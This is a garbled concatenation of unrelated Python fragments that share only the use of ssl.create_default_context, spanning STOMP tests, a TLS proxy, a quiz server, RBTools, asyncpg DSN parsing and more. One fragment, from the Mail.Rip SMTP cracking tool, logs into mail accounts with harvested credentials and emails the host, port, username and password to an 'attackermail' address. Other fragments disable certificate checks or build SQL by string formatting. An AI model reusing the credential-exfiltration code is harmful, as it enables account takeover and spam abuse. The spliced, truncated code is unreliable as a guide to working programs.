file_input = c.input("\n[b bright_cyan]Choose Your Email List [b bright_yellow](XLSX)[/b bright_yellow]File Here \nYou Can Also Paste The Path Link Of File [b bright_red]'Using Shift + Right Click'[/b bright_red]-> [/b bright_cyan]").replace('"', '')
self.fire(subscribe(self.queue, ack=ACK_AUTO))
print("connected")
def message(self, event, headers, message):
self.received.append(message)
print("received")
def subscribe_success(self, *args, **kwargs):
print("subscribed")
def disconnected(self, *args, **kwargs):
print("disconnected")
@needstomp
@pytest.mark.parametrize("context", [ssl.create_default_context(), None])
def test_stomp_ssl(manager, watcher, tmpdir, context):
""" test ssl connection """
port = 61614
if context:
context.check_hostname = True
context.verify_mode = ssl.CERT_REQUIRED
else:
# Run like older Python version w/out ssl context
pass
app = App(QUEUE).register(manager)
client = StompClient(URI,
port,
username=LOGIN,
from pytrends.request import TrendReq import pprint import pdb import certifi import ssl import time import geopy.geocoders from geopy.geocoders import Nominatim ctx = ssl.create_default_context(cafile=certifi.where()) geopy.geocoders.options.default_ssl_context = ctx #geolocator = Nominatim(scheme='http') geopy.geocoders.options.default_user_agent = "my-application" geopy.geocoders.options.default_timeout = 7 geolocator = Nominatim() import pandas as pd import sys import pandas as pd import numpy as np import requests import io from io import BytesIO from io import StringIO import csv import datetime import json import sys from importlib import reload from collections import defaultdict # Configure pprint
import ssl, socket, logging, threading, time
logging.basicConfig(filename="proxy.log",
level=logging.DEBUG,
format="%(asctime)s - %(message)s")
# ssl.create_default_context(purpose=Purpose.SERVER_AUTH, cafile=None, capath=None, cadata=None)
# In server mode, if you want to authenticate your clients using the SSL layer you’ll also have to specify CERT_REQUIRED
# and similarly check the client certificate. Passing SERVER_AUTH as purpose sets verify_mode to CERT_REQUIRED.
context = ssl.create_default_context(cafile="ca.crt")
context.load_cert_chain(certfile="server.crt", keyfile="server.key")
# hostname don`t match with hostname in cert.
context.check_hostname = False
# Load the key generation parameters for Diffie-Helman (DH) key exchange. This setting doesn’t apply to client sockets.
context.load_dh_params("dh.pem")
bindsocket = socket.socket()
bindsocket.bind(("", 7788))
bindsocket.settimeout(5)
bindsocket.listen(10)
lock = threading.Lock()
event = threading.Event()
clients = {}
class ProxySocket(threading.Thread):
def __init__(self):
super().__init__(daemon=True)
self.running = True
def stop(self):
self.running = False
def sendcheckmsg(mailhost, mailport, mailuser, mailpass, proxy, proxyport):
if attackermail == str('*****@*****.**'):
print(Fore.LIGHTRED_EX + Style.BRIGHT +
'(!) Mailsending check skipped (!) for: ' + str(mailuser) +
' ...\n')
else:
socket.setdefaulttimeout(tout)
msgcontext = ssl.create_default_context()
if usesocks == 1:
socks.set_default_proxy(socks.PROXY_TYPE_SOCKS5, str(proxy),
int(proxyport))
socks.wrapmodule(smtplib)
else:
pass
#generate randomID:
randomid = uuid.uuid4().hex
randomid = str(randomid[0:8])
randomid = randomid.upper()
#prepare e-mail content for sending check:
mailsender = str(mailuser)
mailreceiver = str(attackermail)
mail = MIMEMultipart('alternative')
mail['Subject'] = str('Test Result for ID ' + str(randomid))
mail['From'] = str(mailsender)
mail['To'] = str(mailreceiver)
#mailcontent for plain text e-mail:
mailtext = '''
Hello!
This message has been sent using the following SMTP:
HOST: ''' + str(mailhost) + '''
PORT: ''' + str(mailport) + '''
USER: ''' + str(mailuser) + '''
PASS: ''' + str(mailpass) + '''
If you like Mail.Rip donate, please! My wallet (BTC):
1M8PrpZ3VFHuGrnYJk63MtoEmoJxwiUxYf
Every donations gives me time for improving this and other tools.
Best wishes,
DrPython3'''
#mailcontent for HTML e-mail:
mailhtml = '''
<!doctype html>
<html lang="en-US">
<head>
<title>Test Result for ID ''' + str(randomid) + '''</title>
</head>
<body>
<p>Hello!</p>
<p>This message has been sent using the following SMTP:</p>
<p>
<b>HOST:</b> ''' + str(mailhost) + '''<br>
<b>PORT:</b> ''' + str(mailport) + '''<br>
<b>USER:</b> ''' + str(mailuser) + '''<br>
<b>PASS:</b> ''' + str(mailpass) + '''
</p>
<p>
<i>If you like <a href="https://github.com/DrPython3/mailripv1">Mail.Rip</a> donate, please! My wallet (BTC):</i><br>
<b>1M8PrpZ3VFHuGrnYJk63MtoEmoJxwiUxYf</b>
</p>
<p>Every donation gives me time for improving this and other tools.</p>
<p>
Best wishes,<br>
DrPython3
</p>
</body>
</html>'''
mpart1 = MIMEText(mailtext, "plain")
mpart2 = MIMEText(mailhtml, "html")
mail.attach(mpart1)
mail.attach(mpart2)
try:
mailer = smtplib.SMTP_SSL(str(mailhost),
int(mailport),
context=msgcontext)
except:
try:
mailer = smtplib.SMTP(str(mailhost), int(mailport))
try:
mailer.starttls(context=msgcontext)
except:
pass
except:
pass
try:
mailer.login(str(mailuser), str(mailpass))
mailer.sendmail(mailsender, mailreceiver, mail.as_string())
print(Fore.LIGHTGREEN_EX + Style.BRIGHT +
'Finally, an e-mail has been sent with: ' + str(mailuser) +
' ... so, check your inbox later ...\n')
except:
print(Fore.LIGHTRED_EX + Style.BRIGHT +
'(!) Sending e-mail failed (!) for: ' + str(mailuser) +
' ...\n')
try:
mailer.quit()
except:
pass
def collectdhcp():
#
myssl = ssl.create_default_context()
myssl.check_hostname = False
myssl.verify_mode = ssl.CERT_NONE
conn = pymysql.connect(host=host,
port=port,
user=user,
passwd=passwd,
db=db)
typeop = "op"
cmd = "<show><dhcp><server><lease><interface>%s</interface></lease></server></dhcp></show>" % (
interface)
cmd1 = "%s?key=%s&type=%s&cmd=%s" % (base, key, typeop, cmd)
# print (cmd1)
req = urllib.request.Request(cmd1, data=None)
# req.add_header( 'key', key )
# req.add_header( 'type', typeop )
# req.add_header( 'cmd', cmd )
resp_str = urllib.request.urlopen(req, context=myssl)
result = resp_str.read()
print(result)
tree = ET.fromstring(result)
for child in tree.iter('entry'):
ip = child.find('ip').text
mac = child.find('mac')
if mac is None:
mac = 'blank'
else:
mac = child.find('mac').text
hostname = child.find('hostname')
if hostname is None:
hostname = 'blank'
else:
hostname = child.find('hostname').text
name = child.get('name')
leasetime = child.find('leasetime')
if leasetime is None:
leasetime = 'Jan 1 00:00:01 1970'
leasetime = datetime.strptime(leasetime, '%b %d %H:%M:%S %Y')
else:
leasetime = child.find('leasetime').text
leaselen = len(leasetime)
leasetime = leasetime[:leaselen - 1]
leasetime = datetime.strptime(leasetime, '%a %b %d %H:%M:%S %Y')
# print(ip, mac, hostname, leasetime )
state = (
"insert into DHCP (IPaddr, MacAddr, Hostname, Leasetime , Source) values (INET_ATON('%s'),'%s','%s','%s' , 'FW' ) ON DUPLICATE KEY UPDATE IPaddr=INET_ATON('%s'), Hostname='%s' , Leasetime='%s' ;"
) % (ip, mac, hostname, leasetime, ip, hostname, leasetime)
cur = conn.cursor()
cur.execute(state)
cur.close()
# conn.commit()
state2 = (
"SELECT MacAddr FROM DHCP where `source`= 'FW' and Vendor is null;")
cur2 = conn.cursor()
cur2.execute(state2)
results2 = cur2.fetchall()
for row in results2:
mac = row[0]
# print (mac)
myssl = ssl.create_default_context()
myssl.check_hostname = False
myssl.verify_mode = ssl.CERT_NONE
url = "https://api.macvendors.com/%s" % (mac)
req = urllib.request.Request(url, data=None)
try:
resp_str = urllib.request.urlopen(req, context=myssl)
result3 = resp_str.read().decode('utf-8')
result3 = result3.replace('\uff0c', '')
print(mac, ' = ', result3)
except urllib.error.HTTPError as error:
print(error.code)
result3 = 'Unknown'
# print(mac ,' = ' , result3 )
cur3 = conn.cursor()
state3 = ("UPDATE DHCP set vendor = \"%s\" where MacAddr = \"%s\";"
) % (result3, mac)
cur3.execute(state3)
cur3.close()
# print(mac ,' + ' , result3 )
time.sleep(1)
# conn.commit()
cur2.close()
conn.commit()
conn.close()
from urllib.request import urlopen
from bs4 import BeautifulSoup
import ssl
# Ignore SSL certificate errors
ctx = ssl.create_default_context()
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
#url = "http://www.py4e.com/code3/urllink2.py"
url = input('Enter - ')
html = urlopen(url, context=ctx).read()
soup = BeautifulSoup(html, "html.parser")
comments = soup('span')
numbers = []
for comment in comments:
number = int(comment.getText().split('\n')[0])
numbers.append(number)
#print(numbers)
total = sum(numbers)
print(total)
def main():
bank = {
" Consider a C99 function of type <b>void</b>.Which of the following statements is true?<p></p>":
"<input name=\"vehicle\" value=\"a1\" type=\"radio\">The function must haveprecisely 0 return statements<br>"
+
" <input name=\"vehicle\" value=\"a2\" type=\"radio\">The function must have precisely 1 return statement<br>"
+
" <input name=\"vehicle\" value=\"a3\" type=\"radio\">The function must have at least 1 return statement<br>"
+
" <input name=\"vehicle\" value=\"a4\" type=\"radio\">The function may have any number of return statements<br>"
+
" <input value=\"Submit my answer for marking\" type=\"submit\">",
" Who is father of <b>C</b> Language?<p></p>":
"<input name=\"vehicle\" value=\"a1\" type=\"radio\">Dr. E.F. Codd<br>"
+
" <input name=\"vehicle\" value=\"a2\" type=\"radio\">Bjame Stroustrup<br>"
+
" <input name=\"vehicle\" value=\"a3\" type=\"radio\">Dennis Ritchie<br>"
+
" <input name=\"vehicle\" value=\"a4\" type=\"radio\">James A. Gosling<br>"
+
" <input value=\"Submit my answer for marking\" type=\"submit\">",
" C programs are converted into <b>machine language</b> with the help of?<p></p>":
"<input name=\"vehicle\" value=\"a1\" type=\"radio\">An Editor<br>" +
" <input name=\"vehicle\" value=\"a2\" type=\"radio\">A compiler<br>"
+
" <input name=\"vehicle\" value=\"a3\" type=\"radio\">An operating system<br>"
+
" <input name=\"vehicle\" value=\"a4\" type=\"radio\">None of the above<br>"
+
" <input value=\"Submit my answer for marking\" type=\"submit\">",
" A C <b>variable</b> cannot start with? <p></p>":
"<input name=\"vehicle\" value=\"a1\" type=\"radio\">An alphabet<br>" +
" <input name=\"vehicle\" value=\"a2\" type=\"radio\">A number<br>"
+
" <input name=\"vehicle\" value=\"a3\" type=\"radio\">A special symbol<br>"
+
" <input name=\"vehicle\" value=\"a4\" type=\"radio\">both (b) and (c) <br>"
+
" <input value=\"Submit my answer for marking\" type=\"submit\">",
" Which of the following is <b>allowed</b> in a C Arithmetic instruction? <p></p>":
"<input name=\"vehicle\" value=\"a1\" type=\"radio\">[]<br>" +
" <input name=\"vehicle\" value=\"a2\" type=\"radio\">{}<br>"
+
" <input name=\"vehicle\" value=\"a3\" type=\"radio\">()<br>"
+
" <input name=\"vehicle\" value=\"a4\" type=\"radio\">None of the above<br>"
+
" <input value=\"Submit my answer for marking\" type=\"submit\">",
" Write a Java function which is passed two parameters -a vector of integers,and an integer indicating the number of elements in that vector -and returns the second largest integer in the vector.<br>You may assume that the vector contains at least two different values.<p></p>":
"<textarea name =\"vehicle\" rows=\"8\" cols=\"60\">public static int secondLarge(int vectors[], intn){\n\n}</textarea><br>"
+ "<input value=\"Submit my answer for marking\" type=\"submit\">"
}
answer = {
" Consider a C99 function of type <b>void</b>.Which of the following statements is true?<p></p>":
"a4",
" Who is father of <b>C</b> Language?<p></p>":
"a3",
" C programs are converted into <b>machine language</b> with the help of?<p></p>":
"a2",
" A C <b>variable</b> cannot start with? <p></p>":
"a4",
" Which of the following is <b>allowed</b> in a C Arithmetic instruction? <p></p>":
"a3",
" Write a C99 function which is passed two parameters -a vector of integers,and an integer indicating the number of elements in that vector -and returns the second largest integer in the vector.<br>":
"1"
}
context = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
context.load_cert_chain("questionserver.crt", "questionserver.key",
"password")
soc = socket.socket()
host = "0.0.0.0"
port = 2004
print("Server running at: " + host, port)
soc.bind((host, port))
soc.listen(5)
'''
msg is basically the question header
'''
while True:
newsocket, addr = soc.accept()
conn = context.wrap_socket(newsocket, server_side=True)
print("Got connection from", addr)
length_of_message = int.from_bytes(conn.recv(2), byteorder='big')
msg = conn.recv(length_of_message).decode("UTF-8")
# get question header
print(msg)
print(length_of_message)
''' if the question header is in the question bank'''
''' q for returning questoin'''
''' b for returning question Body'''
''' a for checking answer'''
''' p for programming questoin'''
if msg[0] == 'q':
''' return the body with > bank[msg]'''
message_to_send = list(bank.keys())[int(msg[1])].encode("UTF-8")
conn.send(len(message_to_send).to_bytes(2, byteorder='big'))
conn.send(message_to_send)
elif msg[0] == 'b':
''' return the body with > bank[msg]'''
message_to_send = list(bank.values())[int(msg[1])].encode("UTF-8")
conn.send(len(message_to_send).to_bytes(2, byteorder='big'))
conn.send(message_to_send)
elif msg[0] == 'a':
''' check if msg equal to answer in answer bank'''
if list(answer.values())[int(msg[1])] == msg[2:]:
message_to_send = "right".encode("UTF-8")
conn.send(len(message_to_send).to_bytes(2, byteorder='big'))
conn.send(message_to_send)
else:
message_to_send = "wrong".encode("UTF-8")
conn.send(len(message_to_send).to_bytes(2, byteorder='big'))
conn.send(message_to_send)
''' create a java file containing the answer by user'''
''' compile it and run it '''
''' see if the output same as expected output in answer bank'''
elif msg[0] == 'p':
textarea = msg[2:]
ans = str(jaFunc("secLarge.java", textarea))
print(ans[2], list(answer.values())[int(msg[1])])
if list(answer.values())[int(msg[1])] == ans[2]:
message_to_send = "right".encode("UTF-8")
conn.send(len(message_to_send).to_bytes(2, byteorder='big'))
conn.send(message_to_send)
if os.path.isfile("secLarge.class"):
print("The dir is: %s" % os.listdir(os.getcwd()))
os.remove("secLarge.class")
print("The dir is: %s" % os.listdir(os.getcwd()))
else:
message_to_send = "wrong".encode("UTF-8")
conn.send(len(message_to_send).to_bytes(2, byteorder='big'))
conn.send(message_to_send)
else:
print("nothing to send")
conn.shutdown(socket.SHUT_RDWR)
conn.close()
print("Connection with ", addr, " closed")
def __init__(self, url, cookie_file=None, username=None, password=None,
api_token=None, agent=None, session=None, disable_proxy=False,
auth_callback=None, otp_token_callback=None,
verify_ssl=True, save_cookies=True, ext_auth_cookies=None,
ca_certs=None, client_key=None, client_cert=None,
proxy_authorization=None):
if not url.endswith('/'):
url += '/'
self.url = url + 'api/'
self.save_cookies = save_cookies
self.ext_auth_cookies = ext_auth_cookies
if self.save_cookies:
self.cookie_jar, self.cookie_file = create_cookie_jar(
cookie_file=cookie_file)
try:
self.cookie_jar.load(ignore_expires=True)
except IOError:
pass
else:
self.cookie_jar = CookieJar()
self.cookie_file = None
if self.ext_auth_cookies:
try:
self.cookie_jar.load(ext_auth_cookies, ignore_expires=True)
except IOError as e:
logging.critical('There was an error while loading a '
'cookie file: %s', e)
pass
# Get the cookie domain from the url. If the domain
# does not contain a '.' (e.g. 'localhost'), we assume
# it is a local domain and suffix it (See RFC 2109).
parsed_url = urlparse(url)
self.domain = parsed_url[1].partition(':')[0] # Remove Port.
if self.domain.count('.') < 1:
self.domain = '%s.local' % self.domain
if session:
cookie = Cookie(
version=0,
name=RB_COOKIE_NAME,
value=session,
port=None,
port_specified=False,
domain=self.domain,
domain_specified=True,
domain_initial_dot=True,
path=parsed_url[2],
path_specified=True,
secure=False,
expires=None,
discard=False,
comment=None,
comment_url=None,
rest={'HttpOnly': None})
self.cookie_jar.set_cookie(cookie)
if self.save_cookies:
self.cookie_jar.save()
if username:
# If the username parameter is given, we have to clear the session
# cookie manually or it will override the username:password
# combination retrieved from the authentication callback.
try:
self.cookie_jar.clear(self.domain, parsed_url[2],
RB_COOKIE_NAME)
except KeyError:
pass
# Set up the HTTP libraries to support all of the features we need.
password_mgr = ReviewBoardHTTPPasswordMgr(self.url,
username,
password,
api_token,
auth_callback,
otp_token_callback)
self.preset_auth_handler = PresetHTTPAuthHandler(self.url,
password_mgr)
handlers = []
if not verify_ssl:
context = ssl._create_unverified_context()
else:
context = ssl.create_default_context(cafile=ca_certs)
if client_cert or client_key:
context.load_cert_chain(client_cert, client_key)
handlers.append(HTTPSHandler(context=context))
if disable_proxy:
handlers.append(ProxyHandler({}))
handlers += [
HTTPCookieProcessor(self.cookie_jar),
ReviewBoardHTTPBasicAuthHandler(password_mgr),
HTTPDigestAuthHandler(password_mgr),
self.preset_auth_handler,
ReviewBoardHTTPErrorProcessor(),
]
if agent:
self.agent = agent
else:
self.agent = 'RBTools/' + get_package_version()
opener = build_opener(*handlers)
headers = [(str('User-agent'), str(self.agent))]
if proxy_authorization:
headers.append((str('Proxy-Authorization'),
str(proxy_authorization)))
opener.addheaders = headers
install_opener(opener)
self._cache = None
self._urlopen = urlopen
def ajru(model):
goods = {
'iPhone7_32':
'iPhone 7 32GB',
'iPhone8_64':
'iPhone 8 64GB',
'iPhone8_256':
'iPhone 8 256GB',
'iPhone8Plus_64':
'iPhone 8 Plus 64GB',
'iPhone8Plus_256':
'iPhone 8 Plus 256GB',
'iPhoneXS_64':
'iPhone XS 64GB',
'iPhoneXS_256':
'iPhone XS 256GB',
'iPhoneXS_512':
'iPhone XS 512GB',
'iPhoneXSmax_64':
'iPhone XS Max 64GB (с 1 sim)',
'iPhoneXSmax_256':
'iPhone XS Max 256GB (с 1 sim)',
'iPhoneXSmax_512':
'iPhone XS Max 512GB (с 1 sim)',
'iPhone11_64':
'iPhone 11 64GB &mdash',
'iPhone11_128':
'iPhone 11 128GB &mdash',
'iPhone11_256':
'iPhone 11 256GB &mdash',
'iPhone11Pro_64':
'iPhone 11 Pro 64GB (с 1 sim)',
'iPhone11Pro_256':
'iPhone 11 Pro 256GB (с 1 sim)',
'iPhone11Pro_512':
'iPhone 11 Pro 512GB (с 1 sim)',
'iPhone11ProMax_64':
'iPhone 11 Pro Max 64GB (с 1 sim)',
'iPhone11ProMax_256':
'iPhone 11 Pro Max 256GB (с 1 sim)',
'iPhone11ProMax_512':
'iPhone 11 Pro Max 512GB (с 1 sim)',
'AirPods2':
'Apple AirPods 2 поколения с проводной зарядкой',
'AirPods2wireless':
'Apple AirPods 2 поколения с возможностью беспроводной зарядки'
}
if model not in goods:
return '-'
else:
url = 'https://aj.ru/index.html'
ctx = ssl.create_default_context()
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
req = urllib.request.Request(url, headers=headers)
html = urllib.request.urlopen(req, context=ctx)
html_text = html.read().decode("utf8")
for one_str in html_text.split('\n'):
if goods.get(model) in one_str:
price = one_str.split('<span>')[-1].split('</span>')[0]
if 'AirPods2' in model:
return price
return price
def parse_dsn(
dsn: str, ) -> Tuple[Tuple[Tuple[str, int], ...], ConnectionParameters, ]:
# `auth_hosts` is the version of host information for the purposes
# of reading the pgpass file.
auth_hosts = None
host: List[str] = []
port: Union[int, List[int]] = []
user = None
password = None
passfile = None
database = None
sslmode_str = None
server_settings: Dict[str, str] = {}
parsed = urllib.parse.urlparse(dsn)
if parsed.scheme not in {'postgresql', 'postgres'}:
raise ValueError('invalid DSN: scheme is expected to be either '
'"postgresql" or "postgres", got {!r}'.format(
parsed.scheme))
if parsed.netloc:
if '@' in parsed.netloc:
dsn_auth, _, dsn_hostspec = parsed.netloc.partition('@')
else:
dsn_hostspec = parsed.netloc
dsn_auth = ''
else:
dsn_auth = dsn_hostspec = ''
if dsn_auth:
dsn_user, _, dsn_password = dsn_auth.partition(':')
else:
dsn_user = dsn_password = ''
if dsn_hostspec:
host, port = _parse_hostlist(dsn_hostspec, [], unquote=True)
if parsed.path:
dsn_database = parsed.path
if dsn_database.startswith('/'):
dsn_database = dsn_database[1:]
database = urllib.parse.unquote(dsn_database)
if dsn_user:
user = urllib.parse.unquote(dsn_user)
if dsn_password:
password = urllib.parse.unquote(dsn_password)
if parsed.query:
query: Dict[str, str] = {}
pq = urllib.parse.parse_qs(parsed.query, strict_parsing=True)
for k, v in pq.items():
if isinstance(v, list):
query[k] = v[-1]
else:
query[k] = cast(str, v)
if 'port' in query:
val = query.pop('port')
if not port and val:
port = [int(p) for p in val.split(',')]
if 'host' in query:
val = query.pop('host')
if not host and val:
host, port = _parse_hostlist(val, port)
if 'dbname' in query:
val = query.pop('dbname')
if database is None:
database = val
if 'database' in query:
val = query.pop('database')
if database is None:
database = val
if 'user' in query:
val = query.pop('user')
if user is None:
user = val
if 'password' in query:
val = query.pop('password')
if password is None:
password = val
if 'passfile' in query:
passfile = query.pop('passfile')
if 'sslmode' in query:
sslmode_str = query.pop('sslmode')
if query:
server_settings = query
if not host:
hostspec = os.environ.get('PGHOST')
if hostspec:
host, port = _parse_hostlist(hostspec, port)
if not host:
auth_hosts = ['localhost']
if _system == 'Windows':
host = ['localhost']
else:
host = [
'/run/postgresql', '/var/run/postgresql', '/tmp',
'/private/tmp', 'localhost'
]
if auth_hosts is None:
auth_hosts = host
if not port:
portspec = os.environ.get('PGPORT')
if portspec:
if ',' in portspec:
port = [int(p) for p in portspec.split(',')]
else:
port = int(portspec)
else:
port = 5432
elif isinstance(port, (list, tuple)):
port = [int(p) for p in port]
else:
port = int(port)
port = _validate_port_spec(host, port)
if user is None:
user = os.getenv('PGUSER')
if not user:
user = getpass.getuser()
if password is None:
password = os.getenv('PGPASSWORD')
if database is None:
database = os.getenv('PGDATABASE')
if database is None:
database = user
if user is None:
raise ValueError('could not determine user name to connect with')
if database is None:
raise ValueError('could not determine database name to connect to')
if password is None:
if passfile is None:
passfile = os.getenv('PGPASSFILE')
if passfile is None:
homedir = get_pg_home_directory()
if not homedir:
passfile_path = None
else:
passfile_path = homedir / PGPASSFILE
else:
passfile_path = pathlib.Path(passfile)
if passfile_path is not None:
password = _read_password_from_pgpass(hosts=auth_hosts,
ports=port,
database=database,
user=user,
passfile=passfile_path)
addrs: List[Tuple[str, int]] = []
for h, p in zip(host, port):
addrs.append((h, p))
if not addrs:
raise ValueError(
'could not determine the database address to connect to')
if sslmode_str is None:
sslmode_str = os.getenv('PGSSLMODE', 'prefer')
if sslmode_str:
try:
sslmode = SSLMode.parse(sslmode_str)
except AttributeError:
modes = ', '.join(m.name.replace('_', '-') for m in SSLMode)
raise ValueError(
'`sslmode` parameter must be one of: {}'.format(modes))
# docs at https://www.postgresql.org/docs/10/static/libpq-connect.html
# Not implemented: sslcert & sslkey & sslrootcert & sslcrl params.
if sslmode < SSLMode.allow:
ssl = None
else:
ssl = ssl_module.create_default_context()
ssl.check_hostname = sslmode >= SSLMode.verify_full
ssl.verify_mode = ssl_module.CERT_REQUIRED
if sslmode <= SSLMode.require:
ssl.verify_mode = ssl_module.CERT_NONE
else:
ssl = None
sslmode = SSLMode.disable
if ssl:
for addr in addrs:
if isinstance(addr, str):
# UNIX socket
raise ValueError(
'`ssl` parameter can only be enabled for TCP addresses, '
'got a UNIX socket path: {!r}'.format(addr))
if server_settings is not None and (
not isinstance(server_settings, dict)
or not all(isinstance(k, str) for k in server_settings)
or not all(isinstance(v, str) for v in server_settings.values())):
raise ValueError('server_settings is expected to be None or '
'a Dict[str, str]')
params = ConnectionParameters(
user=user,
password=password,
database=database,
ssl=ssl,
sslmode=sslmode,
server_settings=server_settings,
)
return tuple(addrs), params
import tkinter as tk
from tkinter import filedialog
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart
from email.mime.base import MIMEBase
import email, smtplib, ssl
from email import encoders
from email.mime.application import MIMEApplication
import mimetypes
import os
import config
context = ssl.create_default_context() # SSL Context Connection
filelist = []
SIGNATURES = { # Add HTML Encoding
"Select Signature": """\
This is an example Signature<br>"""
}
# TEMPLATES
def select_template_fun(): # TODO: Fix CC and BCC and add extra details box
def browse_file(): # Select a file to open
global filelist
filelist = filedialog.askopenfilenames()
files_attached_tk.set("Files Attached: " + str(len(filelist)))
def worker(area):
global available_blender_dists_cache
global available_blender_dists_cache_list
mirrors = [
'https://download.blender.org/release/',
'https://mirror.clarkson.edu/blender/release/',
'https://ftp.nluug.nl/pub/graphics/blender/release/',
]
ctx = ssl.create_default_context()
print('INFO: Search for blender embedded certificates...')
for path in site.getsitepackages():
path = os.path.join(path, 'certifi', 'cacert.pem')
if not os.path.exists(path):
continue
ctx.load_verify_locations(cafile=path)
print('INFO: found certifi certificates: %s' % (path,))
break
if len(ctx.get_ca_certs()) == 0:
print('WARN: certificates not found - skip certs verification')
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
for url in mirrors:
try:
# Getting the first layer of mirror list
parser = LinkHTMLParser()
with urlopen(url, timeout=1, context=ctx) as f:
parser.feed(f.read().decode())
# Processing links of the first layer
links = parser.links()
dirs = []
for l in links:
if not l.startswith('Blender'):
continue
ver = int(''.join(c for c in l if c.isdigit()))
if ver >= 280: # >= 2.80 is supported
dirs.append(l)
# Getting lists of the specific dirs
for d in dirs:
with urlopen(url+d, timeout=1, context=ctx) as f:
parser.feed(f.read().decode())
# Processing links of the dirs
links = parser.links()
for l in links:
if not l.endswith('.sha256'):
continue
# Getting the file and search for linux dist there
with urlopen(url+d+l, timeout=1, context=ctx) as f:
for line in f:
sha256, name = line.decode().strip().split()
if '-linux' not in name or '64.tar' not in name:
continue
ver = name.split('-')[1]
available_blender_dists_cache[ver] = {
'url': url+d+name,
'checksum': sha256,
}
print('INFO: found blender version: %s (%s %s)' % (ver, url, sha256))
# Don't need to check the other sites
break
except Exception as e:
print('WARN: unable to get mirror list for: %s %s' % (url, e))
keys = naturalSort(available_blender_dists_cache.keys())
out = []
for key in keys:
out.append( (key, key, available_blender_dists_cache[key]['url']) )
available_blender_dists_cache_list = out
updateBlenderDistProp()
if area:
area.tag_redraw()
def __init__(self,
connection,
master=None,
password=None,
db=None,
ssl_context=None):
'''
The connection address can be one of the following:
* a dict - {'host': 'localhost', 'port': 6379}
* a Redis URI - "redis://*****:*****@host:26379/0?master=mymaster&encoding=utf-8";
* a (host, port) tuple - ('localhost', 26379);
:param master: The name of the master to connect to via the sentinel
:param password: The password to use to connect to the redis master
:param db: The db to use on the redis master
:param ssl_context: The ssl context to assign to the redis connection.
If ssl_context is ``True``, the default ssl context in python will be assigned, otherwise
an ssl context must be provided.
Explicitly specified parameters overwrite implicit options in the ``connection`` variable.
For example, if 'master' is specified in the connection dictionary,
but also specified as the master kwarg, the master kwarg will be used
instead.
'''
address, kwargs = (), {}
if isinstance(connection, dict):
kwargs.update(connection)
address = [(kwargs.pop('host'), kwargs.pop('port', 26379))]
elif isinstance(connection, str) and re.match(
r'^rediss?://.*\:\d+/\d?\??.*$', connection):
url = urllib.parse.urlparse(connection)
query = {
key: value[0]
for key, value in urllib.parse.parse_qs(url.query).items()
}
address = [(url.hostname, url.port or 6379)]
dbnum = url.path.strip('/')
if url.scheme == 'rediss':
kwargs['ssl'] = ssl.create_default_context()
verify_mode = query.pop('ssl_cert_reqs', None)
if verify_mode is not None and hasattr(ssl,
verify_mode.upper()):
if verify_mode == 'CERT_NONE':
kwargs['ssl'].check_hostname = False
kwargs['ssl'].verify_mode = getattr(
ssl, verify_mode.upper())
kwargs['db'] = int(dbnum) if dbnum.isdigit() else 0
kwargs['password'] = url.password
kwargs.update(query)
elif isinstance(connection, tuple):
address = [connection]
elif isinstance(connection, list):
address = connection
else:
raise SentinelConfigError('Invalid Sentinel Configuration')
if db is not None:
kwargs['db'] = db
if password is not None:
kwargs['password'] = password
if ssl_context is True:
kwargs['ssl'] = ssl.create_default_context()
elif ssl_context is not None:
kwargs['ssl'] = ssl_context
self.master = kwargs.pop('master', None)
if master:
self.master = master
if self.master is None:
raise SentinelConfigError(
'Master name required for sentinel to be configured')
kwargs['minsize'] = 1 if 'minsize' not in kwargs else int(
kwargs['minsize'])
kwargs['maxsize'] = 100 if 'maxsize' not in kwargs else int(
kwargs['maxsize'])
self.connection = address
self.redis_kwargs = kwargs
import asyncio
import ssl
headers = {}
ssl = ssl.create_default_context(purpose=ssl.Purpose.CLIENT_AUTH)
async def get_page(session, url, get_blob=False, chunksize=None):
await asyncio.sleep(0.2)
async with session.get(url, headers=headers, ssl=ssl) as resp:
# print(resp.status)
resp.raise_for_status()
if chunksize:
return await resp.content.read(chunksize)
return await resp.read() if get_blob else await resp.text()
async def post_page(session, url, data):
await asyncio.sleep(0.2)
async with session.post(url, data=data, headers=headers, ssl=ssl) as resp:
resp.raise_for_status()
return await resp.text()
import ssl
import faust
from configs import config
from configs.badge_configuration import badges as badge_config
from configs.config import awarder_configuration
from configs.config import datastore_configuration
from events.ludus_event import LudusEvent
from ludus.datastore import Datastore
import json
import re
#Setting up Faust app
ssl_context = ssl.create_default_context(
purpose=ssl.Purpose.SERVER_AUTH,
cafile=config.kafka_configuration['cacert_file'])
app = faust.App(awarder_configuration['faust_app_name'],
broker='kafka://' +
config.kafka_configuration['bootstrap_server'],
broker_credentials=ssl_context,
store=awarder_configuration['faust_store'])
#Setting Kafka topic for stream processors
events = app.topic(config.kafka_configuration['topic'], value_type=LudusEvent)
#Initializing faust tables
event_data = app.Table(awarder_configuration['events_table_name'],
default=None,
partitions=8)
awarded_badges = app.Table(awarder_configuration['badges_table_name'],
default=None,
partitions=8)
def _fetch_url(self, url, body, headers, q):
# Parse and fetch the current url
trigger = self._trigger_result
chunk_size = self._chunk_size
report_progress = self.on_progress is not None
timeout = self._timeout
file_path = self.file_path
ca_file = self.ca_file
verify = self.verify
if self._debug:
Logger.debug('UrlRequest: {0} Fetch url <{1}>'.format(
id(self), url))
Logger.debug('UrlRequest: {0} - body: {1}'.format(
id(self), body))
Logger.debug('UrlRequest: {0} - headers: {1}'.format(
id(self), headers))
# parse url
host, port, userpass, parse = self._parse_url(url)
if userpass and not headers:
headers = userpass
elif userpass and headers:
key = list(userpass.keys())[0]
headers[key] = userpass[key]
# translate scheme to connection class
cls = self.get_connection_for_scheme(parse.scheme)
# reconstruct path to pass on the request
path = parse.path
if parse.params:
path += ';' + parse.params
if parse.query:
path += '?' + parse.query
if parse.fragment:
path += '#' + parse.fragment
# create connection instance
args = {}
if timeout is not None:
args['timeout'] = timeout
if (ca_file is not None and hasattr(ssl, 'create_default_context') and
parse.scheme == 'https'):
ctx = ssl.create_default_context(cafile=ca_file)
ctx.verify_mode = ssl.CERT_REQUIRED
args['context'] = ctx
if not verify and parse.scheme == 'https' and (
hasattr(ssl, 'create_default_context')):
ctx = ssl.create_default_context()
ctx.check_hostname = False
